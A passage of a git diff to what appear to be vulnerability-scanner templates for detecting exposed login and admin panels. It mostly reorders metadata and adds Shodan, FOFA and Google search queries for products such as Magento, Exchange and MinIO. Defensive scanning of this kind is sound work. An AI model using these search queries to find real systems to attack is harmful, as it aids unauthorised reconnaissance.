title:"Lansweeper - Login" - vendor: lansweeper verified: true + max-request: 1 + vendor: lansweeper + product: lansweeper + shodan-query: + - title:"Lansweeper - Login" + - http.title:"lansweeper - login" + fofa-query: title="lansweeper - login" + google-query: intitle:"lansweeper - login" tags: lansweeper,tech,panel http: diff --git a/http/exposed-panels/ldap-account-manager-panel.yaml b/http/exposed-panels/ldap-account-manager-panel.yaml index 3ba3a162d6..9c7623438a 100644 --- a/http/exposed-panels/ldap-account-manager-panel.yaml +++ b/http/exposed-panels/ldap-account-manager-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: title:"LDAP Account Manager" - verified: true tags: panel,ldap http: diff --git a/http/exposed-panels/lenovo-fp-panel.yaml b/http/exposed-panels/lenovo-fp-panel.yaml index 8ce4d1b5e6..ac7bcf1e92 100644 --- a/http/exposed-panels/lenovo-fp-panel.yaml +++ b/http/exposed-panels/lenovo-fp-panel.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:lenovo:fan_power_controller:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: fan_power_controller - shodan-query: http.html:"Fan and Power Controller" - vendor: lenovo verified: true + max-request: 2 + vendor: lenovo + product: fan_power_controller + shodan-query: + - http.html:"Fan and Power Controller" + - http.html:"fan and power controller" + fofa-query: body="fan and power controller" tags: panel,lenovo http: diff --git a/http/exposed-panels/librenms-login.yaml b/http/exposed-panels/librenms-login.yaml index 13cbab886c..04787f97b4 100644 --- a/http/exposed-panels/librenms-login.yaml +++ b/http/exposed-panels/librenms-login.yaml @@ -10,10 +10,10 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:* metadata: - fofa-query: title="librenms" max-request: 1 - product: librenms vendor: librenms + product: librenms + fofa-query: title="librenms" tags: librenms,panel http: diff --git a/http/exposed-panels/librephotos-panel.yaml b/http/exposed-panels/librephotos-panel.yaml index 24ce313d6e..b63b378024 100644 --- a/http/exposed-panels/librephotos-panel.yaml +++ b/http/exposed-panels/librephotos-panel.yaml @@ -7,9 +7,9 @@ info: reference: - https://github.com/LibrePhotos/librephotos metadata: + verified: true max-request: 1 shodan-query: title:"LibrePhotos" - verified: true tags: panel,librephotos,detect,login http: diff --git a/http/exposed-panels/librespeed-panel.yaml b/http/exposed-panels/librespeed-panel.yaml index de2f5f7c49..cccf0d50e9 100644 --- a/http/exposed-panels/librespeed-panel.yaml +++ b/http/exposed-panels/librespeed-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/librespeed/speedtest metadata: + verified: true max-request: 1 shodan-query: title:"LibreSpeed" - verified: true tags: panel,librespeed,detect http: diff --git a/http/exposed-panels/liferay-portal.yaml b/http/exposed-panels/liferay-portal.yaml index 2e77adaecd..c7f0d40df3 100644 --- a/http/exposed-panels/liferay-portal.yaml +++ b/http/exposed-panels/liferay-portal.yaml @@ -13,11 +13,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* metadata: - max-request: 3 - product: liferay_portal - shodan-query: http.favicon.hash:129457226 - vendor: liferay verified: true + max-request: 3 + vendor: liferay + product: liferay_portal + shodan-query: + - http.favicon.hash:129457226 + - cpe:"cpe:2.3:a:liferay:liferay_portal" + fofa-query: icon_hash=129457226 tags: panel,liferay,portal http: diff --git a/http/exposed-panels/linkerd-panel.yaml b/http/exposed-panels/linkerd-panel.yaml index f519306563..946b921de8 100644 --- a/http/exposed-panels/linkerd-panel.yaml +++ b/http/exposed-panels/linkerd-panel.yaml @@ -11,11 +11,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:linkerd:linkerd:*:*:*:*:kubernetes:*:*:* metadata: - max-request: 1 - product: linkerd - shodan-query: html:"data-controller-namespace" - vendor: linkerd verified: true + max-request: 1 + vendor: linkerd + product: linkerd + shodan-query: + - html:"data-controller-namespace" + - http.html:"data-controller-namespace" + fofa-query: body="data-controller-namespace" tags: panel,misconfig,linkerd,exposure http: diff --git a/http/exposed-panels/linshare-panel.yaml b/http/exposed-panels/linshare-panel.yaml index 1cbd30641e..f3211780a6 100644 --- a/http/exposed-panels/linshare-panel.yaml +++ b/http/exposed-panels/linshare-panel.yaml @@ -9,9 +9,9 @@ info: - https://www.linshare.org/ - https://github.com/linagora/linshare metadata: + verified: true max-request: 3 shodan-query: http.title:"LinShare" - verified: true tags: panel,linshare,login,detect http: diff --git a/http/exposed-panels/livehelperchat-admin-panel.yaml b/http/exposed-panels/livehelperchat-admin-panel.yaml index ecba3823f0..ec86122799 100644 --- a/http/exposed-panels/livehelperchat-admin-panel.yaml +++ b/http/exposed-panels/livehelperchat-admin-panel.yaml @@ -10,12 +10,17 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:livehelperchat:live_helper_chat:*:*:*:*:*:*:*:* metadata: - fofa-query: title="Live Helper Chat" - max-request: 1 - product: live_helper_chat - shodan-query: title:"Live Helper Chat" - vendor: livehelperchat verified: true + max-request: 1 + vendor: livehelperchat + product: live_helper_chat + shodan-query: + - title:"Live Helper Chat" + - http.title:"live helper chat" + fofa-query: + - title="Live Helper Chat" + - title="live helper chat" + google-query: intitle:"live helper chat" tags: livehelperchat,panel http: diff --git a/http/exposed-panels/livezilla-login-panel.yaml b/http/exposed-panels/livezilla-login-panel.yaml index e5954e2f65..f0265db335 100644 --- a/http/exposed-panels/livezilla-login-panel.yaml +++ b/http/exposed-panels/livezilla-login-panel.yaml @@ -11,8 +11,10 @@ info: cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: livezilla vendor: livezilla + product: livezilla + shodan-query: http.html:livezilla + fofa-query: body=livezilla tags: panel,livezilla,login http: diff --git a/http/exposed-panels/locklizard-webviewer-panel.yaml b/http/exposed-panels/locklizard-webviewer-panel.yaml index 9dc5197be3..57a6e7b9dc 100644 --- a/http/exposed-panels/locklizard-webviewer-panel.yaml +++ b/http/exposed-panels/locklizard-webviewer-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: html:"Locklizard Web Viewer" - verified: true tags: panel,locklizard,webviewer http: diff --git a/http/exposed-panels/lockself-panel.yaml b/http/exposed-panels/lockself-panel.yaml index 100c23b03a..781e23acc1 100644 --- a/http/exposed-panels/lockself-panel.yaml +++ b/http/exposed-panels/lockself-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.lockself.com/en/ metadata: + verified: true max-request: 1 shodan-query: http.title:"LockSelf" - verified: true tags: panel,lockself,login,detect http: diff --git a/http/exposed-panels/logitech-harmony-portal.yaml b/http/exposed-panels/logitech-harmony-portal.yaml index ff6b57b576..cdd28d2e8d 100644 --- a/http/exposed-panels/logitech-harmony-portal.yaml +++ b/http/exposed-panels/logitech-harmony-portal.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Logitech Harmony Pro Installer" - verified: true tags: panel,logitech,harmony,exposure http: diff --git a/http/exposed-panels/lomnido-panel.yaml b/http/exposed-panels/lomnido-panel.yaml index ed6906b085..257a57b10c 100644 --- a/http/exposed-panels/lomnido-panel.yaml +++ b/http/exposed-panels/lomnido-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://lomnido.com/ metadata: + verified: true max-request: 1 shodan-query: http.title:"Lomnido Login" - verified: true tags: lomnido,panel,login,detect http: diff --git a/http/exposed-panels/looker-panel.yaml b/http/exposed-panels/looker-panel.yaml index 8cfc10179a..8fc1e16a09 100644 --- a/http/exposed-panels/looker-panel.yaml +++ b/http/exposed-panels/looker-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"lookerVersion" - verified: true tags: panel,login,looker http: diff --git a/http/exposed-panels/loxone-panel.yaml b/http/exposed-panels/loxone-panel.yaml index 1f10ffc748..e60d8fd34d 100644 --- a/http/exposed-panels/loxone-panel.yaml +++ b/http/exposed-panels/loxone-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Loxone Intercom Video" - verified: true tags: panel,loxone http: diff --git a/http/exposed-panels/mach-proweb-login.yaml b/http/exposed-panels/mach-proweb-login.yaml index e592756d4d..8daab9a27c 100644 --- a/http/exposed-panels/mach-proweb-login.yaml +++ b/http/exposed-panels/mach-proweb-login.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Log on to MACH-ProWeb" - max-request: 1 verified: true + max-request: 1 + google-query: intitle:"Log on to MACH-ProWeb" tags: panel,machproweb,edb http: diff --git a/http/exposed-panels/machform-admin-panel.yaml b/http/exposed-panels/machform-admin-panel.yaml index 48721ca1b5..d5e6529fc0 100644 --- a/http/exposed-panels/machform-admin-panel.yaml +++ b/http/exposed-panels/machform-admin-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"MachForm Admin Panel" - verified: true tags: panel,machform,admin http: diff --git a/http/exposed-panels/maestro-login-panel.yaml b/http/exposed-panels/maestro-login-panel.yaml index 1a207ca7ae..b7633739c7 100644 --- a/http/exposed-panels/maestro-login-panel.yaml +++ b/http/exposed-panels/maestro-login-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Maestro - LuCI" - verified: true tags: panel,maestro,luci http: diff --git a/http/exposed-panels/mag-dashboard-panel.yaml b/http/exposed-panels/mag-dashboard-panel.yaml index 4131968392..212d688bc6 100644 --- a/http/exposed-panels/mag-dashboard-panel.yaml +++ b/http/exposed-panels/mag-dashboard-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"MAG Dashboard Login" - verified: true tags: panel,mag http: diff --git a/http/exposed-panels/magento-admin-panel.yaml b/http/exposed-panels/magento-admin-panel.yaml index 2b34bec945..3b839abab9 100644 --- a/http/exposed-panels/magento-admin-panel.yaml +++ b/http/exposed-panels/magento-admin-panel.yaml @@ -13,11 +13,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: magento - shodan-query: http.component:"Magento" - vendor: magento verified: true + max-request: 1 + vendor: magento + product: magento + shodan-query: + - http.component:"Magento" + - cpe:"cpe:2.3:a:magento:magento" + - http.component:"magento" tags: magento,panel http: diff --git a/http/exposed-panels/magento-downloader-panel.yaml b/http/exposed-panels/magento-downloader-panel.yaml index 776d0ef150..5da56797d6 100644 --- a/http/exposed-panels/magento-downloader-panel.yaml +++ b/http/exposed-panels/magento-downloader-panel.yaml @@ -12,11 +12,14 @@ info: classification: cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: magento - shodan-query: http.component:"Magento" - vendor: magento verified: true + max-request: 1 + vendor: magento + product: magento + shodan-query: + - http.component:"Magento" + - cpe:"cpe:2.3:a:magento:magento" + - http.component:"magento" tags: magento,exposure,panel http: diff --git a/http/exposed-panels/magnolia-panel.yaml b/http/exposed-panels/magnolia-panel.yaml index b89b7d42ac..142f151ca9 100644 --- a/http/exposed-panels/magnolia-panel.yaml +++ b/http/exposed-panels/magnolia-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: html:"Magnolia is a registered trademark" - verified: true tags: magnolia,panel,login http: diff --git a/http/exposed-panels/mailhog-panel.yaml b/http/exposed-panels/mailhog-panel.yaml index 90246e87a5..90982dff9f 100644 --- a/http/exposed-panels/mailhog-panel.yaml +++ b/http/exposed-panels/mailhog-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"mailhog" - verified: true tags: panel,mailhog,mail,smtp http: diff --git a/http/exposed-panels/mailwatch-login.yaml b/http/exposed-panels/mailwatch-login.yaml index 03d81def4c..8ce0bfce40 100644 --- a/http/exposed-panels/mailwatch-login.yaml +++ b/http/exposed-panels/mailwatch-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"MailWatch Login Page" - verified: true tags: panel,mailwatch http: diff --git a/http/exposed-panels/maltrail-panel.yaml b/http/exposed-panels/maltrail-panel.yaml index d8e45550eb..06fd079f2c 100644 --- a/http/exposed-panels/maltrail-panel.yaml +++ b/http/exposed-panels/maltrail-panel.yaml @@ -7,9 +7,9 @@ info: description: | Maltrail is a malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails, along with static trails compiled from various AV reports and custom user defined lists, where trail can be anything from domain name, URL (e.g. hXXp://109.162.38.120/harsh02.exe for known malicious executable), IP address (e.g. 185.130.5.231 for known attacker) or HTTP User-Agent header value. metadata: + verified: true max-request: 1 shodan-query: title:"Maltrail" - verified: true tags: panel,maltrail,detect http: diff --git a/http/exposed-panels/mantisbt-panel.yaml b/http/exposed-panels/mantisbt-panel.yaml index 2740052f80..a21fcb73e1 100644 --- a/http/exposed-panels/mantisbt-panel.yaml +++ b/http/exposed-panels/mantisbt-panel.yaml @@ -12,11 +12,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: mantisbt - shodan-query: http.favicon.hash:662709064 - vendor: mantisbt verified: true + max-request: 1 + vendor: mantisbt + product: mantisbt + shodan-query: + - http.favicon.hash:662709064 + - cpe:"cpe:2.3:a:mantisbt:mantisbt" + fofa-query: icon_hash=662709064 tags: panel,mantisbt http: diff --git a/http/exposed-panels/matomo-panel.yaml b/http/exposed-panels/matomo-panel.yaml index 0fe7fd23af..e36fd314fd 100644 --- a/http/exposed-panels/matomo-panel.yaml +++ b/http/exposed-panels/matomo-panel.yaml @@ -15,10 +15,13 @@ info: cpe: cpe:2.3:a:matomo:matomo:*:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 - product: matomo + max-request: 3 vendor: matomo - shodan-query: http.favicon.hash:-2023266783 + product: matomo + shodan-query: + - "http.favicon.hash:-2023266783" + - cpe:"cpe:2.3:a:matomo:matomo" + fofa-query: icon_hash=-2023266783 tags: panel,matomo,login,detect http: diff --git a/http/exposed-panels/memos-panel.yaml b/http/exposed-panels/memos-panel.yaml index d6e8a9d429..a10594589d 100644 --- a/http/exposed-panels/memos-panel.yaml +++ b/http/exposed-panels/memos-panel.yaml @@ -12,11 +12,15 @@ info: classification: cpe: cpe:2.3:a:usememos:memos:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: memos - shodan-query: title:"Memos" - vendor: usememos verified: true + max-request: 2 + vendor: usememos + product: memos + shodan-query: + - title:"Memos" + - http.title:"memos" + fofa-query: title="memos" + google-query: intitle:"memos" tags: panel,memos,detect,usememos http: diff --git a/http/exposed-panels/meshcentral-login.yaml b/http/exposed-panels/meshcentral-login.yaml index ab9bc4476b..3835210b64 100644 --- a/http/exposed-panels/meshcentral-login.yaml +++ b/http/exposed-panels/meshcentral-login.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:meshcentral:meshcentral:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: meshcentral - shodan-query: http.title:"MeshCentral - Login" vendor: meshcentral + product: meshcentral + shodan-query: + - http.title:"MeshCentral - Login" + - http.title:"meshcentral - login" + fofa-query: title="meshcentral - login" + google-query: intitle:"meshcentral - login" tags: panel,meshcentral http: diff --git a/http/exposed-panels/metabase-panel.yaml b/http/exposed-panels/metabase-panel.yaml index 4f4365f5e0..be0cc52f0d 100644 --- a/http/exposed-panels/metabase-panel.yaml +++ b/http/exposed-panels/metabase-panel.yaml @@ -11,9 +11,15 @@ info: cpe: cpe:2.3:a:metabase:metabase:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: metabase - shodan-query: http.title:"Metabase" vendor: metabase + product: metabase + shodan-query: + - http.title:"Metabase" + - http.title:"metabase" + fofa-query: + - title="metabase" + - app="metabase" + google-query: intitle:"metabase" tags: panel,metabase,login http: diff --git a/http/exposed-panels/metasploit-panel.yaml b/http/exposed-panels/metasploit-panel.yaml index 6e9ffcbe38..8db8721111 100644 --- a/http/exposed-panels/metasploit-panel.yaml +++ b/http/exposed-panels/metasploit-panel.yaml @@ -11,12 +11,22 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:rapid7:metasploit:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: metasploit - shodan-query: http.title:"metasploit" - vendor: rapid7 verified: true - zoomeye-query: title:'Metasploit' + max-request: 1 + vendor: rapid7 + product: metasploit + shodan-query: + - http.title:"metasploit" + - http.title:"metasploit - setup and configuration" + zoomeye-query: + - title:'Metasploit' + - title:'metasploit' + fofa-query: + - title="metasploit" + - title="metasploit - setup and configuration" + google-query: + - intitle:"metasploit" + - intitle:"metasploit - setup and configuration" tags: panel,metasploit,login,rapid7 http: diff --git a/http/exposed-panels/metasploit-setup-page.yaml b/http/exposed-panels/metasploit-setup-page.yaml index 13fd587383..659bd96521 100644 --- a/http/exposed-panels/metasploit-setup-page.yaml +++ b/http/exposed-panels/metasploit-setup-page.yaml @@ -10,11 +10,21 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:rapid7:metasploit:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: metasploit - shodan-query: title:"Metasploit - Setup and Configuration" - vendor: rapid7 verified: true + max-request: 1 + vendor: rapid7 + product: metasploit + shodan-query: + - title:"Metasploit - Setup and Configuration" + - http.title:"metasploit" + - http.title:"metasploit - setup and configuration" + zoomeye-query: title:'metasploit' + fofa-query: + - title="metasploit" + - title="metasploit - setup and configuration" + google-query: + - intitle:"metasploit" + - intitle:"metasploit - setup and configuration" tags: panel,metasploit,setup,rapid7 http: diff --git a/http/exposed-panels/metersphere-login.yaml b/http/exposed-panels/metersphere-login.yaml index c91bce9369..89dccedc81 100644 --- a/http/exposed-panels/metersphere-login.yaml +++ b/http/exposed-panels/metersphere-login.yaml @@ -13,8 +13,12 @@ info: cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: metersphere vendor: metersphere + product: metersphere + fofa-query: + - body="metersphere" + - title="metersphere" + shodan-query: http.html:"metersphere" tags: panel,metersphere http: diff --git a/http/exposed-panels/mfiles-web-detect.yaml b/http/exposed-panels/mfiles-web-detect.yaml index eb80eff0e3..415b0b2c1f 100644 --- a/http/exposed-panels/mfiles-web-detect.yaml +++ b/http/exposed-panels/mfiles-web-detect.yaml @@ -12,11 +12,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:m-files:m-files:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: m-files - shodan-query: http.html:"M-Files Web" - vendor: m-files verified: true + max-request: 2 + vendor: m-files + product: m-files + shodan-query: + - http.html:"M-Files Web" + - http.html:"m-files web" + fofa-query: body="m-files web" tags: panel,m-files http: diff --git a/http/exposed-panels/microfocus-admin-server.yaml b/http/exposed-panels/microfocus-admin-server.yaml index ebfc273cf2..e00f37d0ac 100644 --- a/http/exposed-panels/microfocus-admin-server.yaml +++ b/http/exposed-panels/microfocus-admin-server.yaml @@ -10,11 +10,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:microfocus:enterprise_server:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: enterprise_server - shodan-query: Micro Focus DSD - vendor: microfocus verified: true + max-request: 4 + vendor: microfocus + product: "enterprise_server" + shodan-query: + - "Micro Focus DSD" + - micro focus dsd tags: panel,microfocus,detect,login http: diff --git a/http/exposed-panels/microfocus-filr-panel.yaml b/http/exposed-panels/microfocus-filr-panel.yaml index 84917c5591..575bf2190b 100644 --- a/http/exposed-panels/microfocus-filr-panel.yaml +++ b/http/exposed-panels/microfocus-filr-panel.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:microfocus:filr:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - product: filr + max-request: 2 vendor: microfocus - shodan-query: http.html:"Micro Focus Filr" + product: filr + shodan-query: + - "http.html:\"Micro Focus Filr\"" + - http.html:"micro focus filr" + fofa-query: body="micro focus filr" tags: panel,microfocus,filr,detect http: diff --git a/http/exposed-panels/microfocus-lifecycle-panel.yaml b/http/exposed-panels/microfocus-lifecycle-panel.yaml index 3ac49b36dd..2ba1d9ffff 100644 --- a/http/exposed-panels/microfocus-lifecycle-panel.yaml +++ b/http/exposed-panels/microfocus-lifecycle-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.opentext.com/products/alm-quality-center metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Micro Focus Application Lifecycle Management" tags: panel,microfocus,login,detect diff --git a/http/exposed-panels/microfocus-vibe-panel.yaml b/http/exposed-panels/microfocus-vibe-panel.yaml index fe281b5dbc..d4b8adc101 100644 --- a/http/exposed-panels/microfocus-vibe-panel.yaml +++ b/http/exposed-panels/microfocus-vibe-panel.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:microfocus:vibe:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: vibe - shodan-query: http.html:"Micro Focus Vibe" - vendor: microfocus verified: true + max-request: 1 + vendor: microfocus + product: vibe + shodan-query: + - http.html:"Micro Focus Vibe" + - http.html:"micro focus vibe" + fofa-query: body="micro focus vibe" tags: panel,microfocus,vibe http: diff --git a/http/exposed-panels/microsoft-exchange-panel.yaml b/http/exposed-panels/microsoft-exchange-panel.yaml index 719b83d355..9e646bc45c 100644 --- a/http/exposed-panels/microsoft-exchange-panel.yaml +++ b/http/exposed-panels/microsoft-exchange-panel.yaml @@ -13,8 +13,16 @@ info: cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: exchange_server vendor: microsoft + product: exchange_server + shodan-query: + - http.favicon.hash:1768726119 + - http.title:"outlook" + - cpe:"cpe:2.3:a:microsoft:exchange_server" + fofa-query: + - icon_hash=1768726119 + - title="outlook" + google-query: intitle:"outlook" tags: microsoft,panel,exchange http: diff --git a/http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml b/http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml index 380d7a3880..52278315a0 100644 --- a/http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml +++ b/http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:mikrotik:routeros:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: routeros - shodan-query: title:"mikrotik routeros > administration" - vendor: mikrotik verified: true + max-request: 1 + vendor: mikrotik + product: routeros + shodan-query: + - title:"mikrotik routeros > administration" + - http.title:"mikrotik routeros > administration" + fofa-query: title="mikrotik routeros > administration" + google-query: intitle:"mikrotik routeros > administration" tags: panel,login,mikrotik http: diff --git a/http/exposed-panels/mikrotik/mikrotik-routeros.yaml b/http/exposed-panels/mikrotik/mikrotik-routeros.yaml index 01a84ddab1..c0f66687ce 100644 --- a/http/exposed-panels/mikrotik/mikrotik-routeros.yaml +++ b/http/exposed-panels/mikrotik/mikrotik-routeros.yaml @@ -13,8 +13,11 @@ info: cpe: cpe:2.3:o:mikrotik:routeros:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: routeros vendor: mikrotik + product: routeros + shodan-query: http.title:"mikrotik routeros > administration" + fofa-query: title="mikrotik routeros > administration" + google-query: intitle:"mikrotik routeros > administration" tags: panel,login,mikrotik http: diff --git a/http/exposed-panels/mini-start-page.yaml b/http/exposed-panels/mini-start-page.yaml index 5f72162cad..6231ba16c2 100644 --- a/http/exposed-panels/mini-start-page.yaml +++ b/http/exposed-panels/mini-start-page.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:miniweb_http_server_project:miniweb_http_server:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: miniweb_http_server vendor: miniweb_http_server_project + product: miniweb_http_server tags: edb,panel,miniweb_http_server_project http: diff --git a/http/exposed-panels/minio-browser.yaml b/http/exposed-panels/minio-browser.yaml index 46d3b2ecc6..b106f768a5 100644 --- a/http/exposed-panels/minio-browser.yaml +++ b/http/exposed-panels/minio-browser.yaml @@ -11,9 +11,20 @@ info: cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: minio - shodan-query: title:"MinIO Browser" vendor: minio + product: minio + shodan-query: + - title:"MinIO Browser" + - http.title:"minio browser" + - cpe:"cpe:2.3:a:minio:minio" + - http.title:"minio console" + fofa-query: + - app="minio" + - title="minio browser" + - title="minio console" + google-query: + - intitle:"minio browser" + - intitle:"minio console" tags: panel,minio http: diff --git a/http/exposed-panels/minio-console.yaml b/http/exposed-panels/minio-console.yaml index 77ffc45b7a..dce33da761 100644 --- a/http/exposed-panels/minio-console.yaml +++ b/http/exposed-panels/minio-console.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: app="MinIO-Console" max-request: 1 shodan-query: title:"MinIO Console" + fofa-query: app="MinIO-Console" tags: panel,minio http: diff --git a/http/exposed-panels/misp-panel.yaml b/http/exposed-panels/misp-panel.yaml index 16b06e9fb9..df3e0c1dde 100644 --- a/http/exposed-panels/misp-panel.yaml +++ b/http/exposed-panels/misp-panel.yaml @@ -7,11 +7,15 @@ info: classification: cpe: cpe:2.3:a:misp:misp:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: misp - shodan-query: http.title:"Users - MISP" - vendor: misp verified: "true" + max-request: 1 + vendor: misp + product: misp + shodan-query: + - http.title:"Users - MISP" + - http.title:"users - misp" + fofa-query: title="users - misp" + google-query: intitle:"users - misp" tags: panel,misp http: diff --git a/http/exposed-panels/mitel-micollab-panel.yaml b/http/exposed-panels/mitel-micollab-panel.yaml index aa1a34cd53..de3d810e5e 100644 --- a/http/exposed-panels/mitel-micollab-panel.yaml +++ b/http/exposed-panels/mitel-micollab-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.mitel.com/products/micollab-miteam-meetings-collaboration-software metadata: + verified: true max-request: 1 shodan-query: http.html:"MiCollab End User Portal" - verified: true tags: panel,mitel,login,detect http: diff --git a/http/exposed-panels/mitel-panel-detect.yaml b/http/exposed-panels/mitel-panel-detect.yaml index 33abfab6bd..b4fe47dc2b 100644 --- a/http/exposed-panels/mitel-panel-detect.yaml +++ b/http/exposed-panels/mitel-panel-detect.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:mitel:cmg_suite:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: cmg_suite - shodan-query: http.html:"Mitel Networks" - vendor: mitel verified: true + max-request: 2 + vendor: mitel + product: cmg_suite + shodan-query: + - http.html:"Mitel Networks" + - http.html:"mitel networks" + fofa-query: body="mitel networks" tags: panel,mitel http: diff --git a/http/exposed-panels/mitric-checker-panel.yaml b/http/exposed-panels/mitric-checker-panel.yaml index 2e5db90096..87f1f081d9 100644 --- a/http/exposed-panels/mitric-checker-panel.yaml +++ b/http/exposed-panels/mitric-checker-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.mitric.com/en/audit-with-checker/ metadata: - max-request: 2 verified: true + max-request: 2 tags: panel,mitric,login,detect http: diff --git a/http/exposed-panels/mobile-management-panel.yaml b/http/exposed-panels/mobile-management-panel.yaml index 1bbe3f00db..6ddcc21bdb 100644 --- a/http/exposed-panels/mobile-management-panel.yaml +++ b/http/exposed-panels/mobile-management-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: title="移动管理平台-企业管理" - max-request: 1 verified: true + max-request: 1 + fofa-query: title="移动管理平台-企业管理" tags: panel,mobile,management http: diff --git a/http/exposed-panels/mobileiron-sentry.yaml b/http/exposed-panels/mobileiron-sentry.yaml index 2741bb9a06..cb20c289af 100644 --- a/http/exposed-panels/mobileiron-sentry.yaml +++ b/http/exposed-panels/mobileiron-sentry.yaml @@ -8,9 +8,9 @@ info: reference: - 